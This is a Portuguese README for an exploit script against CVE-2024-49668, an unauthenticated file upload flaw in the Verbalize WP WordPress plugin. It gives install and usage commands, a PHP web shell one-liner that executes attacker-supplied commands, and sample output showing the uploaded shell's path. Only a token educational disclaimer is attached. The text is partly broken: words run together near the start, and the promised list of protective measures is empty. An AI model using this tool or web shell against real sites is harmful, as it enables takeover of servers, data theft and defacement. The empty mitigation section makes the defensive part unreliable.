
Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilidade de upload arbitrário de arquivos
CVE-2024-49668 é uma vulnerabilidade crítica no plugin Verbalize WP do WordPress, versões 1.0 e anteriores. Esta vulnerabilidade permite que atacantes não autenticados enviem arquivos arbitrários, incluindo web shells, para o servidor web. O problema ocorre devido à validação de entrada insuficiente e a restrições inadequadas de tipos de arquivo durante o upload.
Este script Python explora a vulnerabilidade CVE-2024-49668 para enviar um arquivo shell para o site WordPress alvo usando o plugin Verbalize WP.
readme.txt.requestsInstale a biblioteca necessária usando o pip:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Execute a POST request to a WordPress site.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-s, --shell SHELL Shell code to upload
Por padrão, o script enviará um shell PHP que executa phpinfo().
python CVE-2024-49668.py -u http://target.com
Você também pode especificar um código de shell PHP personalizado para ser enviado:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
A vulnerabilidade CVE-2024-49668 permite que atacantes obtenham controle total sobre o servidor alvo ao enviar arquivos maliciosos. Explorar esta vulnerabilidade pode levar a consequências graves, incluindo violações de dados, acesso não autorizado e possível desfiguração do site.
Para proteger seu site WordPress desta vulnerabilidade, é recomendado:
Esta ferramenta destina-se apenas a fins educacionais. O uso não autorizado desta ferramenta contra sites sem permissão explícita do proprietário é ilegal. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.
Criado em 2025-03-22 por Nxploited , Khaled alenazi